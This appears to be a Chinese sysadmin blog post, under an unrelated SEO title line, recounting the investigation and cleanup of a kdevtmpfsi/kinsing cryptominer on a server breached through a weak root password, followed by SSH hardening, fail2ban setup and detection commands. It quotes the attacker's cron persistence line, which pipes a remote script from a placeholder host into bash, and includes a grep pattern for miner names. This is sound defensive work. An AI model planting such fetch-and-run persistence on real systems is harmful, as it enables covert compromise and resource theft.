做社交的招聘网站石家庄线上推广平台

做社交的招聘网站,石家庄线上推广平台,做普工招聘网站,广东深圳区号上周五晚上10点#xff0c;正准备关电脑下班#xff0c;收到一条告警#xff1a;服务器CPU 100%。 点开一看#xff0c;好家伙#xff0c;被挖矿了。 记录一下整个排查和处理过程#xff0c;希望对大家有帮助。 发现异常 告警内容#xff1a;[CRITICAL] 生产服务器 192.…上周五晚上10点正准备关电脑下班收到一条告警服务器CPU 100%。点开一看好家伙被挖矿了。记录一下整个排查和处理过程希望对大家有帮助。发现异常告警内容[CRITICAL] 生产服务器 192.168.1.100 CPU使用率 99.8% 持续时间15分钟第一反应难道是流量突增看了一下监控QPS很正常但CPU就是打满了。SSH登上去看看topPID USER %CPU COMMAND 12345 www-data 98.5 ./kdevtmpfsikdevtmpfsi这是啥进程百度一搜典型的挖矿木马。应急处理第一时间隔离# 先把服务器从负载均衡摘掉# 或者直接断外网但我需要SSH连接所以没断# 在防火墙上禁止该服务器对外连接iptables -A OUTPUT -j DROP# 只允许SSHiptables -I OUTPUT -p tcp --dport22-j ACCEPT杀掉挖矿进程# 找到进程psaux|grepkdevtmpfsi# 杀掉kill-912345# 但是几秒后又起来了...说明有守护进程或者定时任务在重启它。查找守护机制# 检查定时任务crontab-lcat/etc/crontabls/etc/cron.d/cat/var/spool/cron/crontabs/*发现了# /var/spool/cron/crontabs/www-data*/5 * * * *curl-s http://xxx.xxx/b.sh|bash每5分钟从外部下载脚本执行。# 删除定时任务crontab-r -u www-data# 再查一下有没有别的grep-rkdevtmpfsi/etc/grep-rcurl.*\.sh/var/还找到了几个地方# /etc/rc.local 里被加了一行/tmp/.cache/kdevtmpfsi# 删掉vim/etc/rc.local清理木马文件# 找到所有可疑文件find/ -namekdevtmpfsi2/dev/nullfind/ -name.cache-type d2/dev/nullfind/tmp -type f -executable2/dev/null# 删除rm-rf /tmp/.cacherm-rf /var/tmp/.cache检查SSH后门# 检查authorized_keyscat/root/.ssh/authorized_keyscat/home/*/.ssh/authorized_keys# 发现多了一个不认识的公钥删掉溯源分析木马清理完了得查查怎么进来的。检查登录日志# 查看最近登录last lastb# 失败的登录# 查看SSH日志grepAccepted/var/log/auth.log|tail-50发现凌晨3点有一次root登录来自一个国外IP。但我们的root是禁止远程登录的啊cat/etc/ssh/sshd_config|grepPermitRootLogin# PermitRootLogin yes谁改的git blame一下配置管理…原来是之前同事调试的时候开的忘记关了。检查入侵方式继续分析日志grepFailed password/var/log/auth.log|wc-l# 854328万多次失败登录典型的暴力破解。再看成功的那次grepAccepted password for root/var/log/auth.log# Dec 15 03:24:17 server sshd[12345]: Accepted password for root from 45.xx.xx.xx密码是什么检查一下root密码复杂度…问了一圈得知root密码是Admin123。典型的弱密码字典里肯定有。根因总结入侵链路1. SSH对外开放22端口 ✓ 2. 允许root远程登录 ✓ 3. root使用弱密码 ✓ 4. 被暴力破解成功 5. 下载挖矿木马 6. 添加定时任务保持持久化每一步都是安全隐患叠加起来就被黑了。加固措施1. SSH安全加固# /etc/ssh/sshd_config# 禁止root登录PermitRootLogin no# 禁止密码登录只用密钥PasswordAuthentication no PubkeyAuthenticationyes# 改端口可选Port22022# 只允许特定用户AllowUsers admin ops# 重启SSHsystemctl restart sshd2. 安装fail2banaptinstallfail2ban -y# 配置cat/etc/fail2ban/jail.localEOF [sshd] enabled true port ssh filter sshd logpath /var/log/auth.log maxretry 3 bantime 86400 findtime 600 EOFsystemctlenablefail2ban systemctl start fail2ban5次失败就封IP一天。3. 防火墙限制# 只允许公司IP访问SSHiptables -A INPUT -p tcp --dport22-s 公司IP -j ACCEPT iptables -A INPUT -p tcp --dport22-j DROP4. 密码策略# 安装密码复杂度检查aptinstalllibpam-pwquality# /etc/security/pwquality.confminlen12dcredit-1 ucredit-1 lcredit-1 ocredit-15. 监控告警加了几个告警规则CPU持续高于80%超过5分钟新增定时任务时告警SSH登录成功告警非白名单IP异常外连告警远程应急的问题这次还好我在公司直接SSH上去处理了。如果是半夜在家收到告警呢家里连不上公司内网服务器。之前的方案是开远程专线但连接经常断手机上操作很麻烦有些服务器在隔离网段专线也连不上后来用星空组网把服务器都组到一起不管在哪都能SSH连上应急方便多了。事后复盘该做没做的定期安全扫描配置文件变更审计SSH配置检查纳入部署流程密码定期更换侥幸逃过的幸好只是挖矿不是勒索病毒幸好数据库没被拖幸好发现得早改进措施所有服务器SSH配置统一管理Ansible每月安全扫描新服务器上线必须经过安全检查重要服务器禁止密码登录常见挖矿木马特征最后总结一下常见的挖矿木马特征方便排查进程名特征kdevtmpfsi最常见kinsing配套木马xmrig门罗币挖矿*.sh在/tmp下可疑脚本# 快速检查命令psaux|grep-Ekdevtmpfsi|kinsing|xmrig|cryptonightfind/tmp /var/tmp -type f -executablecrontab-lcat/etc/rc.local希望大家的服务器都平平安安不要遇到这种事。有安全相关的问题可以评论区交流。